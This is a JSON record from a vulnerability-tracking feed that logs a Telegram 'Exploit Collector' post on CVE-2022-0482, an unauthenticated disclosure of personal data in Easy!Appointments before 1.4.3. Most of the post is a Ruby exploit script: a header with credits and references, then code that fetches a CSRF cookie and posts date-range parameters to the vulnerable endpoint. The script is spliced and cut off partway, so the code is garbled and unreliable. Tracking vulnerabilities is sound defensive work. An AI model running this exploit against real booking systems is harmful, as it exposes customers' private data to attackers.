{"uuid": "d8e233ba-9a03-4a0f-92c7-abf4ec2bfaa8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-0482", "type": "seen", "source": "https://t.me/hacking_Attack/49747", "content": "Exploit Collector\nEasy!Appointments Information Disclosure\n\nhttps://4.bp.blogspot.com/-Lnl-ZxRP9Iw/WWlvEVwqA2I/AAAAAAAAIK8/WG2BCM3S_lsUOouuCwhP5sp3j7hYzeO-wCLcBGAs/s1600/h133.png \nEasy!Appointments versions prior to 1.4.3 suffers from an unauthenticated PII disclosure vulnerability.\n\nMD5 | 8155a1872473245af54963658039235f\n\nDownload\n#!/usr/bin/env ruby\n\n# Exploit\n## Title: Easy!Appointments &lt; 1.4.3 - Unauthenticated PII (events) disclosure\n## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)\n## Author website: https://pwn.by/noraj/\n## Exploit source: https://github.com/Acceis/exploit-CVE-2022-0482\n## Date: 2022-04-11\n## Vendor Homepage: https://easyappointments.org/\n## Software Link: https://github.com/alextselegidis/easyappointments/archive/refs/tags/1.4.2.tar.gz\n## Version: &lt; 1.4.3 (it means up to 1.4.2)\n## Tested on: Easy!Appointments Version 1.3.2\n## References: https://www.exploit-db.com/exploits/FIXME\n\n# Vulnerability\n## Discoverer: Francesco CARLUCCI\n## Date: 2022-01-30\n## Discoverer website: https://carluc.ci/\n## Discovered on OpenNetAdmin 1.4.2\n## Title: Exposure of Private Personal Information to an Unauthorized Actor in alextselegidis/easyappointments\n## CVE: CVE-2022-0482\n## CWE: CWE-863\n## Patch: https://github.com/alextselegidis/easyappointments/commit/bb71c9773627dace180d862f2e258a20df84f887#diff-4c48e5652fb13f13d2a50b6fb5d7027321913c4f8775bb6d1e8f79492bdd796c\n## References:\n##   - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/\n##   - https://github.com/alextselegidis/easyappointments/tree/1.4.2\n##   - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-0482.yaml\n##   - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/\n##   - https://nvd.nist.gov/vuln/detail/CVE-2022-0482\n\nrequire 'date'\nrequire 'httpx'\nrequire 'docopt'\n\ndoc = \nEasy!Appointments &lt; 1.4.3 - Unauthenticated PII (events) disclosure\n\nSource: https://github.com/Acceis/exploit-CVE-2022-0482\n\nUsage:\n#{__FILE__}  http.cookies.first.value, # csrfCookie\n'startDate' =&gt; startDate.nil? ? '2015-01-11' : startDate,\n'endDate' =&gt; endDate.nil? ? Date.today.to_s : endDate\n}\n\nhttp.post(vuln_url, form: params)\nend\n\nbegin\nargs = Docopt.docopt(doc)\npp args if args['--debug']\n\nhttp = HTTPX.plugin(:cookies)\nfetch_csrf(args[' e\nputs e.message\nend\n\nSource:packetstormsecurity.com", "creation_timestamp": "2026-09-01T20:01:45.866019Z"}